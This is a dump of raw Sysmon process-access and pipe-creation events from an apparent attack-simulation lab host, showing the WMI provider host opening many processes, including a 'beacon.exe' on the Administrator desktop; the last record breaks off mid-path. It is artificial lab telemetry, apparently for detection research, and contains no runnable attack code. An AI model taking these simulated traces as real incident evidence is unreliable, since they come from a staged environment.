10341000x80000000000000002239506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002239493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:45.232{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336\PSHost.132591776250910193.11336.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\